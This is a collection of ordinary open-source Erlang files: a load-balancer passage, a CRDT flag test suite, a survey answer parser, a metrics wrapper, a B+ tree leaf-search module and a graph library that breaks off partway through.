%% Weights: 1 2 3 4
%% Arr : 1 3 3 10
%% Doubled: 1 3 3 10 0 0 0 10
[put(Seq, 0) || Seq <- NewFree],
put(Extend - 1, get(ServerCount - 1)),
%% double the size of index_to_pid tuple
NewItp = list_to_tuple(tuple_to_list(setelement(Free + 1, Itp, Server)) ++ NewFree),
%% Now simply update new index in the double size array
inc(Free, Demand, Extend),
{noreply, State#lambda_plb_state{free = NewFree,
index_to_pid = NewItp,
pid_to_index = Pti#{Server => {Free, Demand}}, capacity = Cap + Demand}};
[Free | More] ->
inc(Free, Demand, ServerCount),
{noreply, State#lambda_plb_state{free = More,
index_to_pid = setelement(Free + 1, Itp, Server),
pid_to_index = Pti#{Server => {Free, Demand}}, capacity = Cap + Demand}}
end
end;
handle_info({complete_order, [{_, _, Meta} | _] = Servers}, #lambda_plb_state{module = Module, meta = Waiting} = State) when is_list(Waiting) ->
?LOG_DEBUG("meta ~200p received for ~200p", [Meta, Waiting], #{domain => [lambda]}),
%% start trapping exits just before compiling proxy, to ensure terminate/2 is
%% called when PLB shuts down
process_flag(trap_exit, true),
Module = compile_proxy(Module, Meta),
[gen:reply(To, Meta) || To <- Waiting],
handle_info({complete_order, Servers}, State#lambda_plb_state{meta = maps:get(module, Meta)});
handle_info({complete_order, Servers}, #lambda_plb_state{} = State) ->
%% broker sent an update to us, order was (partially?) fulfilled, connect to provided servers
?LOG_DEBUG("found servers: ~200p", [Servers], #{domain => [lambda]}),
Self = self(),
[erlang:send(Pid, {connect, Self, Cap}, [nosuspend]) || {Pid, Cap, _Meta} <- Servers],
{noreply, State};
handle_info({'DOWN', _MRef, process, Pid, _Reason}, #lambda_plb_state{pid_to_index = Pti, free = Free, capacity = Cap} = State) ->
%% server process died
{{Index, _SrvCap}, NewPti} = maps:take(Pid, Pti),
Removed = read(Index),
inc(Index, -Removed, tuple_size(State#lambda_plb_state.index_to_pid)),
%% block the queue if no capacity left
Cap =:= Removed andalso begin State#lambda_plb_state.queue ! block end,
%% setelement(Index, State#lambda_state.index_to_pid, undefined), %% not necessary, helps debugging
{noreply, State#lambda_plb_state{free = [Index | Free], capacity = Cap - Removed, pid_to_index = NewPti}}.
terminate(_Reason, #lambda_plb_state{module = Mod, meta = Meta}) when is_map_key(exports, Meta) ->
%% delete proxy code for the module
Purged = code:purge(Mod),
Deleted = code:delete(Mod),
%% ignore errors, there is not much to do when terminating
?LOG_DEBUG("~s purge/delete (~p/~p), reason ~200p", [Mod, Purged, Deleted, _Reason], #{domain => [lambda]}),
ok;
terminate(_Reason, _State) ->
ok.
%%--------------------------------------------------------------------
%% Internal implementation
%% Blocking queue: processes are waiting until capacity is available.
queue() ->
receive
unblock ->
% ?LOG_DEBUG("Queue unblocked", [], #{domain => [lambda]}),
queue_open()
end.
queue_open() ->
receive
{'$gen_call', From, wait} ->
% ?LOG_DEBUG("Wait done for ~p", [From], #{domain => [lambda]}),
gen:reply(From, ok),
queue_open();
block ->
% ?LOG_DEBUG("Queue blocked", [], #{domain => [lambda]}),
queue()
end.
%% Implementation specifics:
%% * unspecified value is returned for lower_bound when array is empty
%% * undefined is returned for select when value is beyond max allowed
%% @doc Selects pid, and reduces weight of the pid
%% by 1. Works in O(logN). The Heart of probabilistic
%% load balancer.
-spec take(non_neg_integer(), non_neg_integer()) -> term().
take(Bound, Max) ->
Idx = take_bound(Bound, 0, Max bsr 1),
Last = Max - 1,
put(Last, get(Last) - 1),
Idx.
%% -------------------------------------------------------------------
%% Internal implementation details - Ryabko array primitives
%% @doc Returns value for a specific index of the array.
%% Works in O(logN) time.
read(Idx) ->
Val = get(Idx),
read1(Idx, Val, 1).
read1(Idx, Val, Mask) when Idx band Mask =/= 0 ->
read1(Idx, Val - get(Idx bxor Mask), Mask bsl 1);
read1(_Idx, Val, _Mask) ->
Val.
%% @doc Updates weight at the specified index,
%% adding a number (resulting weight must not
%% be negative). Works in O(logN) time.
inc(Idx, Value, Max) when Idx =< Max ->
put(Idx, get(Idx) + Value),
inc(Idx bor (Idx + 1), Value, Max);
inc(_Idx, _Value, _Max) ->
ok.
%% @doc Returns index in the array which has cumulative
%% frequency equal or greater then requested, and
%% reduces weight of this index by one.
%% Works in O(logN) time.
take_bound(_Bound, Idx, 0) ->
Idx;
take_bound(Bound, Idx, Mask) ->
Mid = Idx + Mask - 1,
Partial = get(Mid),
case Bound - Partial of
Left when Left < 0 ->
put(Mid, Partial - 1),
take_bound(Bound, Idx, Mask bsr 1);
Right ->
take_bound(Right, Idx + Mask, Mask bsr 1)
end.
%% @private creates proxy, dynamically, when meta has been received for the first time.
compile_proxy(Module, Meta) ->
#{module := #{exports := Exports}} = Meta,
%% create a module (technically possible to make an AST, but for compatibility
%% reasons it's better to use text lines for compilation)
ExpLine = "-export([" ++ lists:flatten(lists:join(", ", [io_lib:format("~s/~b", [F, A]) || {F, A} <- Exports])) ++ "]).",
Cast = maps:get(cast, Meta, []),
Impl = [proxy(Module, F, A, Cast) || {F, A} <- Exports],
Lines = ["-module(" ++ atom_to_list(Module) ++ ").", ExpLine] ++ Impl,
%% compile resulting proxy file
Tokens = [begin {ok, T, _} = erl_scan:string(L), T end || L <- Lines],
Forms = [begin {ok, F} = erl_parse:parse_form(T), F end || T <- Tokens],
{ok, Module, Binary} = compile:forms(Forms),
{module, Module} = code:load_binary(Module, "lambda", Binary),
Module.
proxy(M, F, Arity, Cast) ->
Args = lists:join(", ", ["Arg" ++ integer_to_list(Seq) || Seq <- lists:seq(1, Arity)]),
CastCall = case lists:member(F, Cast) of true -> cast; false -> call end,
lists:flatten(io_lib:format("~s(~s) -> lambda_plb:~s(~s, ~s, [~s], infinity).", [F, Args, CastCall, M, F, Args])). | src/lambda_plb.erl | 0.57332 | 0.475118 | lambda_plb.erl | starcoder |
%% -------------------------------------------------------------------
%%
%% Copyright (c) 2016 <NAME>. All Rights Reserved.
%%
%% This file is provided to you under the Apache License,
%% Version 2.0 (the "License"); you may not use this file
%% except in compliance with the License. You may obtain
%% a copy of the License at
%%
%% http://www.apache.org/licenses/LICENSE-2.0
%%
%% Unless required by applicable law or agreed to in writing,
%% software distributed under the License is distributed on an
%% "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
%% KIND, either express or implied. See the License for the
%% specific language governing permissions and limitations
%% under the License.
%%
%% -------------------------------------------------------------------
%%
-module(state_type_semantics_SUITE).
-author("<NAME> <<EMAIL>>").
%% common_test callbacks
-export([init_per_suite/1,
end_per_suite/1,
init_per_testcase/2,
end_per_testcase/2,
all/0]).
%% tests
-compile([nowarn_export_all, export_all]).
-include("state_type.hrl").
-include_lib("common_test/include/ct.hrl").
-include_lib("eunit/include/eunit.hrl").
%% ===================================================================
%% common_test callbacks
%% ===================================================================
init_per_suite(Config) -> Config.
end_per_suite(Config) -> Config.
init_per_testcase(_Case, Config) -> Config.
end_per_testcase(_Case, Config) -> Config.
all() ->
[
flag_test
].
%% ===================================================================
%% tests
%% ===================================================================
flag_test(_Config) ->
List = [
{state_ewflag, true},
{state_dwflag, false}
],
lists:foreach(
fun({FlagType, ExpectedValue}) ->
{Value1, Value2} = flag_mutate_concurrently(FlagType),
?assert(Value1 == Value2),
?assertEqual(ExpectedValue, Value1)
end,
List
).
%% ===================================================================
%% Internal functions
%% ===================================================================
flag_mutate_concurrently(FlagType) ->
ActorA = "A",
ActorB = "B",
ActorC = "C",
Flag0 = FlagType:new(),
{ok, EFlag} = FlagType:mutate(enable, ActorC, Flag0),
{ok, DFlag} = FlagType:mutate(disable, ActorC, Flag0),
?assertEqual(true, FlagType:query(EFlag)),
?assertEqual(false, FlagType:query(DFlag)),
%% concurrent mutations in enabled flag
{ok, EFlagA} = FlagType:mutate(enable, ActorA, EFlag),
{ok, EFlagB} = FlagType:mutate(disable, ActorB, EFlag),
?assertEqual(true, FlagType:query(EFlagA)),
?assertEqual(false, FlagType:query(EFlagB)),
%% merge them
EFlagMerged = FlagType:merge(EFlagA, EFlagB),
%% concurrent mutations in disabled flag
{ok, DFlagA} = FlagType:mutate(enable, ActorA, DFlag),
{ok, DFlagB} = FlagType:mutate(disable, ActorB, DFlag),
?assertEqual(true, FlagType:query(DFlagA)),
?assertEqual(false, FlagType:query(DFlagB)),
%% merge them
DFlagMerged = FlagType:merge(DFlagA, DFlagB),
%% return query values
{
FlagType:query(EFlagMerged),
FlagType:query(DFlagMerged)
}. | test/state_type_semantics_SUITE.erl | 0.609524 | 0.437523 | state_type_semantics_SUITE.erl | starcoder |
%% @author <NAME> <<EMAIL>>
%% @copyright 2012 <NAME>
%% Copyright 2012 <NAME>
%%
%% Licensed under the Apache License, Version 2.0 (the "License");
%% you may not use this file except in compliance with the License.
%% You may obtain a copy of the License at
%%
%% http://www.apache.org/licenses/LICENSE-2.0
%%
%% Unless required by applicable law or agreed to in writing, software
%% distributed under the License is distributed on an "AS IS" BASIS,
%% WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
%% See the License for the specific language governing permissions and
%% limitations under the License.
-module(filter_survey_prepare_thurstone).
-export([
survey_prepare_thurstone/2,
survey_prepare_thurstone/3
]).
survey_prepare_thurstone(Blk, Context) ->
survey_prepare_thurstone(Blk, undefined, Context).
survey_prepare_thurstone(Blk, undefined, Context) ->
survey_prepare_thurstone_1(Blk, proplists:get_value(is_random, Blk, false), Context);
survey_prepare_thurstone(Blk, IsRandom, Context) ->
survey_prepare_thurstone_1(Blk, IsRandom, Context).
survey_prepare_thurstone_1(Blk, IsRandom, Context) ->
Answers = z_trans:lookup_fallback(
proplists:get_value(answers, Blk, <<>>),
Context),
Qs = maybe_randomize(
z_convert:to_bool(IsRandom),
split_markers(split_lines(Answers))),
case z_convert:to_bool(proplists:get_value(is_test, Blk)) of
true ->
[
{is_test, true},
{is_test_direct, z_convert:to_bool(proplists:get_value(is_test_direct, Blk))},
{answers, Qs}
];
false ->
[
{is_test, false},
{answers, Qs}
]
end.
maybe_randomize(false, List) -> List;
maybe_randomize(true, List) -> z_utils:randomize(List).
split_lines(Text) ->
Options = binary:split(z_string:trim(Text), <<"\n">>, [global]),
[ z_string:trim(Option) || Option <- Options ].
split_markers(Qs) ->
split_markers(Qs, 1, []).
split_markers([], _N, Acc) ->
lists:reverse(Acc);
split_markers([[]|Qs], N, Acc) ->
split_markers(Qs, N, Acc);
split_markers([Opt|Qs], N, Acc) ->
split_markers(Qs, N+1, [split_marker(Opt, N)|Acc]).
split_marker(<<$*,Line/binary>>, N) ->
split_marker_1(true, z_string:trim(Line), N);
split_marker(Line, N) ->
split_marker_1(false, Line, N).
split_marker_1(IsCorrect, Line, N) ->
case split_kv(Line) of
[Value,Option] ->
[
{value, Value},
{option, Option},
{is_correct, IsCorrect}
];
[Option] ->
[
{value, z_convert:to_binary(N)},
{option, Option},
{is_correct, IsCorrect}
]
end.
split_kv(Line) ->
split_kv(Line, <<>>).
split_kv(<<>>, Acc) -> [Acc];
split_kv(<<"&#", Rest/binary>>, Acc) -> split_kv(Rest, <<Acc/binary, "&#">>);
split_kv(<<"#", Rest/binary>>, Acc) -> [Acc,Rest];
split_kv(<<C/utf8, Rest/binary>>, Acc) -> split_kv(Rest, <<Acc/binary, C/utf8>>). | apps/zotonic_mod_survey/src/filters/filter_survey_prepare_thurstone.erl | 0.526586 | 0.435721 | filter_survey_prepare_thurstone.erl | starcoder |
%%% -*- erlang -*-
%%%
%%% This file is part of metrics released under the BSD license.
%%% See the LICENSE for more information.
%%%
-module('metrics').
%% API exports
-export([init/1]).
-export([
new/3,
delete/2,
increment_counter/2,
increment_counter/3,
decrement_counter/2,
decrement_counter/3,
update_histogram/3,
update_gauge/3,
update_meter/3]).
-record(metrics_ng, {mod}).
-type metrics_engine() :: #metrics_ng{}.
-type metric() :: counter | histogram | gauge | meter.
-export_types([metrics_engine/0,
metric/0]).
%%====================================================================
%% API functions
%%====================================================================
%% @doc set the module to use for metrics.
%% Types are: counter, histograme, gauge, meter
%%
%% modules supported are:
%% <ul>
%% <li>`metrics_folsom': to interface folsom</li>
%% <li>`metrics_exometer': to interface to exometer</li>
%% <li>`metrics_dummy': a dummy module to use by default.</li>
%% </ul>
-spec init(Mod :: atom()) -> metrics_engine().
init(Mod) ->
%% check the module
_ = code:ensure_loaded(Mod),
case erlang:function_exported(Mod, new, 2) of
false ->
error(badarg);
true ->
ok
end,
#metrics_ng{mod=Mod}.
%% @doc create a new metric
-spec new(metrics_engine(), metric(), any()) -> ok | {error, term()}.
new(#metrics_ng{mod=Mod}, Type, Name) ->
Mod:new(Type, Name).
%% @doc delete a metric
-spec delete(metrics_engine(), any()) -> ok.
delete(#metrics_ng{mod=Mod}, Name) ->
Mod:delete(Name).
%% @doc increment a counter with 1
-spec increment_counter(metrics_engine(), any()) -> ok | {error, term()}.
increment_counter(#metrics_ng{mod=Mod}, Name) ->
Mod:increment_counter(Name).
%% @doc increment a counter with Value
-spec increment_counter(metrics_engine(), any(), pos_integer()) -> ok | {error, term()}.
increment_counter(#metrics_ng{mod=Mod}, Name, Value) ->
Mod:increment_counter(Name, Value).
%% @doc decrement a counter with 1
-spec decrement_counter(metrics_engine(), any()) -> ok | {error, term()}.
decrement_counter(#metrics_ng{mod=Mod}, Name) ->
Mod:decrement_counter(Name).
%% @doc decrement a counter with value
-spec decrement_counter(metrics_engine(), any(), pos_integer()) -> ok | {error, term()}.
decrement_counter(#metrics_ng{mod=Mod}, Name, Value) ->
Mod:decrement_counter(Name, Value).
%% @doc update an histogram with a value or the duration of a function. When
%% passing a function the result will be returned once the metric have been
%% updated with the duration.
-spec update_histogram
(metrics_engine(), any(), number()) -> ok | {error, term()};
(metrics_engine(), any(), function()) -> ok | {error, term()}.
update_histogram(#metrics_ng{mod=Mod}, Name, ValueOrFun) ->
Mod:update_histogram(Name, ValueOrFun).
%% @doc update a gauge with a value
-spec update_gauge(metrics_engine(), any(), number()) -> ok | {error, term()}.
update_gauge(#metrics_ng{mod=Mod}, Name, Value) ->
Mod:update_gauge(Name, Value).
%% @doc update a meter with a valyue
-spec update_meter(metrics_engine(), any(), number()) -> ok | {error, term()}.
update_meter(#metrics_ng{mod=Mod}, Name, Value) ->
Mod:update_meter(Name, Value). | deps/metrics/src/metrics.erl | 0.606032 | 0.400661 | metrics.erl | starcoder |
%%%-------------------------------------------------------------------
%%% @author <NAME>
%%% @copyright (C) 2017: <NAME>
%%% This software is released under the MIT license cited in 'LICENSE.md'.
%%% @end
%%%-------------------------------------------------------------------
%%% @doc
%%% This module provides search functionality for leaf nodes of B+ tree.
%%% @end
%%%-------------------------------------------------------------------
-module(bp_tree_leaf).
-author("<NAME>").
-include("bp_tree.hrl").
%% API exports
-export([find_offset/2, find_next/2, lower_bound/2, lower_bound_node/2]).
-export([find_leftmost/1]).
-type find_pos_result() :: {{ok, pos_integer(), bp_tree:tree_node()} |
{error, term()}, bp_tree:tree()}.
-type find_node_result() :: {{ok, bp_tree_node:id(), bp_tree:tree_node()} |
{error, term()}, bp_tree:tree()}.
%%====================================================================
%% API functions
%%====================================================================
%%--------------------------------------------------------------------
%% @doc
%% Returns leaf containing a key that follows provided key. Along with the node
%% position of the next key is provided.
%% @end
%%--------------------------------------------------------------------
-spec find_next(bp_tree:key(), bp_tree:tree()) -> find_pos_result().
find_next(Key, Tree) ->
case bp_tree_store:get_root_id(Tree) of
{{ok, RootId}, Tree2} -> find_next(Key, RootId, Tree2, []);
{{error, Reason}, Tree2} -> {{error, Reason}, Tree2}
end.
%%--------------------------------------------------------------------
%% @doc
%% Returns leaf containing keys that start from provided offset.
%% @end
%%--------------------------------------------------------------------
-spec find_offset(non_neg_integer(), bp_tree:tree()) -> find_pos_result().
find_offset(Offset, Tree) ->
case find_leftmost(Tree) of
{{ok, _NodeId, Node}, Tree2} ->
find_offset(Offset, Node, Tree2);
{{error, Reason}, Tree2} ->
{{error, Reason}, Tree2}
end.
%%--------------------------------------------------------------------
%% @doc
%% Returns leaf containing first key that is grater or equal to provided key.
%% Along with the node position of the key is provided.
%% @end
%%--------------------------------------------------------------------
-spec lower_bound(bp_tree:key(), bp_tree:tree()) -> find_pos_result().
lower_bound(Key, Tree) ->
case bp_tree_store:get_root_id(Tree) of
{{ok, RootId}, Tree2} -> lower_bound(Key, RootId, Tree2);
{{error, Reason}, Tree2} -> {{error, Reason}, Tree2}
end.
%%--------------------------------------------------------------------
%% @doc
%% Returns leaf containing first key that is grater or equal to provided key.
%% @end
%%--------------------------------------------------------------------
-spec lower_bound_node(bp_tree:key(), bp_tree:tree()) ->
{{ok, bp_tree:tree_node()} | {error, term()}, bp_tree:tree()}.
lower_bound_node(Key, Tree) ->
case bp_tree_store:get_root_id(Tree) of
{{ok, RootId}, Tree2} -> lower_bound_node(Key, RootId, Tree2);
{{error, Reason}, Tree2} -> {{error, Reason}, Tree2}
end.
%%--------------------------------------------------------------------
%% @doc
%% Returns leftmost leaf in a B+ tree.
%% @end
%%--------------------------------------------------------------------
-spec find_leftmost(bp_tree:tree()) -> find_node_result().
find_leftmost(Tree) ->
case bp_tree_store:get_root_id(Tree) of
{{ok, RootId}, Tree2} -> find_leftmost(RootId, Tree2);
{{error, Reason}, Tree2} -> {{error, Reason}, Tree2}
end.
%%====================================================================
%% Internal functions
%%====================================================================
%%--------------------------------------------------------------------
%% @private
%% @doc
%% Returns node and position of next key in B+ tree. Builds a path of right
%% siblings of nodes along the path from a root node to a leaf associated
%% with a key.
%% @end
%%--------------------------------------------------------------------
-spec find_next(bp_tree:key(), bp_tree_node:id(), bp_tree:tree(),
[bp_tree_node:id()]) -> find_pos_result().
find_next(Key, NodeId, Tree, Path) ->
{{ok, Node}, Tree2} = bp_tree_store:get_node(NodeId, Tree),
case bp_tree_node:child_with_right_sibling(Key, Node) of
{ok, NodeId2, RNodeId} ->
find_next(Key, NodeId2, Tree2, [RNodeId | Path]);
{error, not_found} ->
find_next_in_leaf(Key, Node, Tree, Path)
end.
%%--------------------------------------------------------------------
%% @private
%% @doc
%% Returns node and position of next key in B+ tree leaf.
%% @end
%%--------------------------------------------------------------------
-spec find_next_in_leaf(bp_tree:key(), bp_tree:tree_node(), bp_tree:tree(),
[bp_tree_node:id()]) -> find_pos_result().
find_next_in_leaf(Key, Node, Tree, Path) ->
Pos = bp_tree_node:lower_bound(Key, Node),
% TODO - change
case bp_tree_node:key(Pos, Node) of
{ok, Key} ->
case bp_tree_node:value(Pos + 1, Node) of
{ok, _} ->
{{ok, Pos + 1, Node}, Tree};
{error, out_of_range} ->
find_next_using_path(Tree, Path)
end;
{ok, _} ->
{{ok, Pos, Node}, Tree};
{error, out_of_range} ->
find_next_using_path(Tree, Path)
end.
%%--------------------------------------------------------------------
%% @private
%% @doc
%% Helper function to find_next_in_leaf/4 used when next key
%% has not been found in checked node (out_of_range error has appeared).
%% @end
%%--------------------------------------------------------------------
-spec find_next_using_path(bp_tree:tree(), [bp_tree_node:id()]) -> find_pos_result().
find_next_using_path(Tree, Path) ->
Path2 = lists:dropwhile(fun(SNodeId) -> SNodeId == ?NIL end, Path),
case Path2 of
[] ->
{{error, not_found}, Tree};
[SNodeId | _] ->
case find_leftmost(SNodeId, Tree) of
{{ok, _, NextNode}, Tree2} ->
{{ok, 1, NextNode}, Tree2};
{{error, Reason}, Tree2} ->
{{error, Reason}, Tree2}
end
end.
%%--------------------------------------------------------------------
%% @private
%% @doc
%% Returns key at given offset starting from a node. Along with the key
%% a node holding it and its position within this node is returned.
%% @end
%%--------------------------------------------------------------------
-spec find_offset(non_neg_integer(), bp_tree:tree_node(), bp_tree:tree()) ->
find_pos_result().
find_offset(Offset, Node, Tree) ->
Size = bp_tree_node:size(Node),
case Size =< Offset of
true ->
case bp_tree_node:right_sibling(Node) of
{ok, NodeId2} ->
{{ok, Node2}, Tree2} = bp_tree_store:get_node(NodeId2, Tree),
find_offset(Offset - Size, Node2, Tree2);
{error, Reason} ->
{{error, Reason}, Tree}
end;
false ->
{{ok, Offset + 1, Node}, Tree}
end.
%%--------------------------------------------------------------------
%% @private
%% @doc
%% Returns leaf of a B+ tree, rooted in a node identified by ID, that contains
%% first key that is grater or equal to provided key. Along with the node
%% position of the key is provided.
%% @end
%%--------------------------------------------------------------------
-spec lower_bound(bp_tree:key(), bp_tree_node:id(), bp_tree:tree()) ->
find_pos_result().
lower_bound(Key, NodeId, Tree) ->
{[{_, Node} | _], Tree2} = bp_tree_path:find(Key, NodeId, Tree),
Pos = bp_tree_node:lower_bound(Key, Node),
case bp_tree_node:value(Pos, Node) of
{ok, _} -> {{ok, Pos, Node}, Tree2};
{error, out_of_range} -> {{error, not_found}, Tree2}
end.
%%--------------------------------------------------------------------
%% @private
%% @doc
%% Returns leaf of a B+ tree, rooted in a node identified by ID, that contains
%% first key that is grater or equal to provided key.
%% @end
%%--------------------------------------------------------------------
-spec lower_bound_node(bp_tree:key(), bp_tree_node:id(), bp_tree:tree()) ->
{{ok, bp_tree:tree_node()}, bp_tree:tree()}.
lower_bound_node(Key, NodeId, Tree) ->
{[{_, Node} | _], Tree2} = bp_tree_path:find(Key, NodeId, Tree),
{{ok, Node}, Tree2}.
%%--------------------------------------------------------------------
%% @private
%% @doc
%% Returns leftmost leaf in a B+ tree rooted in a node.
%% @end
%%--------------------------------------------------------------------
-spec find_leftmost(bp_tree_node:id(), bp_tree:tree()) -> find_node_result().
find_leftmost(NodeId, Tree) ->
case bp_tree_store:get_node(NodeId, Tree) of
{{ok, Node}, Tree2} ->
case bp_tree_node:leftmost_child(Node) of
{ok, NodeId2} -> find_leftmost(NodeId2, Tree2);
{error, not_found} -> {{ok, NodeId, Node}, Tree2}
end;
{{error, Reason}, Tree2} ->
{{error, Reason}, Tree2}
end. | src/bp_tree_leaf.erl | 0.53777 | 0.456168 | bp_tree_leaf.erl | starcoder |
%% @doc Directed / Undirected Graphs
%%
%% <p>This module implements directed and undirected graphs that are either
%% weighted with numeric weights or unweighted.</p>
%%
%% <p>It is basically syntactic sugar for the digraph module with added
%% support for undirected graphs.</p>
%%
%% <h3>How to use</h3>
%% <p>The fastest way to create a graph is to load it from a file with <code>from_file/1</code>.
%% The file that contains the graph must have the following format.</p>
%%
%% <ul>
%% <li>The 1st line will consist of four terms separeted by a white space.
%% <ul>
%% <li>1st Term: Positive Integer N that denotes the number of vertices</li>
%% <li>2nd Term: Positive Integer M that denotes the number of edges.</li>
%% <li>3rd Term: Atom <code>directed</code> or <code>undirected</code> that denotes the type of the graph.</li>
%% <li>4th Term: Atom <code>unweighted</code> or <code>d</code> or <code>f</code> that denotes the type of the edge weights.
%% <ul>
%% <li><code>unweighted</code> is for an unweighted graph.</li>
%% <li><code>d</code> is for decimal integer weights.</li>
%% <li><code>f</code> is for floating point number weights in proper Erlang syntax.</li>
%% </ul>
%% </li>
%% </ul>
%% </li>
%% <li>The next M lines will consist of the edge descriptions.
%% Each line will contain three terms : U V W.
%% This will denote an edge from U to V with W weight (W applies only if the graph is weighted).</li>
%% </ul>
%%
%% <h3>Alternative syntax</h3>
%% <p>There is also the ability to explicitly state the vertices of the graph and load the graph with <code>from_file/3</code>.
%% In this case the above format is amended as follows:</p>
%%
%% <ul>
%% <li>
%% The 1st line remains unchanged.
%% </li>
%% <li>
%% The 2nd line consists of the vertices. The user will provide a function that will parse this line and return
%% a list of the vertices. The spec of this function is
%% <code>fun(file:io_device(), integer()) -> [vertex()].</code>
%% </li>
%% <li>
%% The next M lines that consist of the edge descriptions remain unchanged.
%% However, the user will provide a function that will parse each line and return
%% the three required terms : U V W. The spec of this function is
%% <code>fun(file:io_device(), weighttype()) -> {vertex(), vertex(), weight()}.</code>
%% </li>
%% </ul>
%%
%% <p>For examples you can check the <code>graph_demo</code> module.</p>
%%
-module(graph).
-export([from_file/1, from_file/3, del_graph/1, vertices/1, edges/1, edge_weight/2,
edges_with_weights/1, out_neighbours/2, num_of_vertices/1, equal/2,
num_of_edges/1, degree/2, get_cycle/2, is_tree/1, pprint/1, graph2text/1, empty/1, empty/2, new/1, new/3, add_vertex/2, add_edge/3,
add_edge/4, graph_type/1, del_vertex/2, del_edge/2, weight_type/1, export/3, import/2]).
-export_type([graph/0, vertex/0, edge/0, weight/0]).
%%
%% @type graph(). A directed or undirected graph.
%% <p>It is wrapper for a digraph with the extra information on its type.</p>
%%
-record(graph, {
type :: graphtype(),
graph :: digraph:graph(),
weightType :: weighttype()
}).
-type graph() :: #graph{}.
-type vertex() :: term().
-type edge() :: {vertex(), vertex()}.
-type graphtype() :: directed | undirected.
-type weight() :: number().
-type weighttype() :: unweighted | d | f.
%% @doc Create a new empty unweighted graph.
-spec empty(graphtype()) -> graph().
empty(Type) when Type =:= directed; Type =:= undirected ->
#graph{type=Type, graph=digraph:new(), weightType = unweighted}.
%% @doc Create a new empty graph with a specific weight type.
-spec empty(graphtype(), weighttype()) -> graph().
empty(T, WT) when (T =:= directed orelse T =:= undirected) andalso
(WT =:= unweighted orelse WT =:= d orelse WT =:= f) ->
#graph{type=T, graph=digraph:new(), weightType=WT}.
%% @doc Creates a new graph from existing graph
-spec new(graph()) -> graph().
new(G) when is_record(G, graph) ->
Graph = empty(G#graph.type, G#graph.weightType),
[ add_vertex(Graph, V) || V <- vertices(G) ],
[ add_edge(Graph, From, To, Wt) || {{From, To}, Wt} <- edges_with_weights(G) ],
Graph.
%% @doc Create graph from vertices and edges
-spec new(graphtype(), [vertex()], [edge()]) -> graph().
new(Type, Vertices, Edges) ->
Graph = graph:empty(Type),
[graph:add_vertex(Graph, V) || V <- Vertices],
lists:foreach(fun
({{V1, V2}, Wt}) ->
graph:add_edge(Graph, V1, V2, Wt);
({V1, V2}) ->
graph:add_edge(Graph, V1, V2)
end, Edges),
Graph.
%% @doc Create a new graph from a file using the default behaviour.
-spec from_file(file:name()) -> graph().
from_file(File) ->
from_file(File, fun read_vertices/2, fun read_edge/2).
%% @doc Create a new graph from a file using a custom behaviour.
%% <p>The user must provide the 2 functions for reading the vertices and the
%% edge descriptions.</p>
%%
%% <p>ReadVertices will take the file descriptor and the number of vertices and
%% return the list of the vertices.</p>
%%
%% <p>ReadEdge will take the file descriptor and the type of the weights of the graph and
%% return the tuple {V1, V2, W}, where V1 is the start of the edge, V2 is the end of the edge
%% and W is the weight of the edge (for unweighted graphs the edge must be 1).</p>
-spec from_file(file:name(), function(), function()) -> graph().
from_file(File, ReadVertices, ReadEdge) ->
{ok, IO} = file:open(File, [read]),
%% N = Number of Vertices :: non_neg_integer()
%% M = Number of Edges :: non_neg_integer()
%% T = Graph Type :: directed | undirected
%% W = Edge Weight weighted :: Weight Type (d | f) | unweighted
{ok, [N, M, T, W]} = io:fread(IO, ">", "~d ~d ~a ~a"),
G = #graph{type=T, graph=digraph:new(), weightType=W},
ok = init_vertices(IO, G, N, ReadVertices),
ok = init_edges(IO, G, M, ReadEdge, T, W),
G.
%% @doc Default function for reading the vertices from a file.
%% <p>The default behaviour is that, given the number of vertices, each vertex
%% is assigned to an integer.</p>
-spec read_vertices(file:io_device(), integer()) -> [integer()].
read_vertices(_IO, N) -> lists:seq(0, N-1).
%% @doc Default function for reading the edge description from a file.
%% <p>The default behaviour is that the edge description is a line that containts
%% three terms: U V W (W applies only to weighted graphs).</p>
%%
%% <p>U is the integer that denotes the start of the edge.</p>
%% <p>V is the integer that denotes the end of the edge.</p>
%% <p>W is the number that denotes the weight of the edge.</p>
-spec read_edge(file:io_device(), weighttype()) -> {vertex(), vertex(), weight()}.
read_edge(IO, WT) ->
read_edge(IO, WT, fun erlang:list_to_integer/1).
read_edge(IO, unweighted, MapVertex) ->
{ok, [V1, V2]} = io:fread(IO, ">", "~s ~s"),
{MapVertex(V1), MapVertex(V2), 1};
read_edge(IO, WT, MapVertex) ->
Format = "~s ~s ~" ++ atom_to_list(WT),
{ok, [V1, V2, W]} = io:fread(IO, ">", Format),
{MapVertex(V1), MapVertex(V2), W}.
%% Initialize the vertices of the graph
-spec init_vertices(file:io_device(), graph(), integer(), function()) -> ok.
init_vertices(IO, Graph, N, ReadVertices) ->
Vs = ReadVertices(IO, N),
lists:foreach(fun(V) -> add_vertex(Graph, V) end, Vs).
%% Initialize the edges of the graph
-spec init_edges(file:io_device(), graph(), integer(), function(), graphtype(), weighttype()) -> ok.
init_edges(_IO, _G, 0, _ReadEdge, _T, _WT) -> ok;
init_edges(IO, G, M, ReadEdge, T, WT) ->
{V1, V2, W} = ReadEdge(IO, WT),
_ = add_edge(G, V1, V2, W),
init_edges(IO, G, M-1, ReadEdge, T, WT).
%% @doc Delete a graph
-spec del_graph(graph()) -> 'true'.
del_graph(G) ->
digraph:delete(G#graph.graph).
%% @doc Return the type of the graph.
-spec graph_type(graph()) -> graphtype().
graph_type(G) ->
G#graph.type.
%% @doc Return the type of the weights.
-spec weight_type(graph()) -> weighttype().
weight_type(G) ->
G#graph.weightType.
%% @doc Add a vertex to a graph
-spec add_vertex(graph(), vertex()) -> vertex().
add_vertex(G, V) ->
digraph:add_vertex(G#graph.graph, V).
%% @doc Add a vertex to a graph
-spec del_vertex(graph(), vertex()) -> vertex().
del_vertex(G, V) ->
digraph:del_vertex(G#graph.graph, V).
%% @doc Return a list of the vertices of a graph
-spec vertices(graph()) -> [vertex()].
vertices(G) ->
digraph:vertices(G#graph.graph).
%% @doc Return the number of vertices in a graph
-spec num_of_vertices(graph()) -> non_neg_integer().
num_of_vertices(G) ->
digraph:no_vertices(G#graph.graph).
%% @doc Add an edge to an unweighted graph.
%% <p>Create an edge with unit weight/</p>
-spec add_edge(graph(), vertex(), vertex()) -> edge().
add_edge(G, From, To) ->
add_edge(G, From, To, 1).
%% @doc Add an edge to a weighted graph
-spec add_edge(graph(), vertex(), vertex(), weight()) -> edge() | {error, not_numeric_weight}.
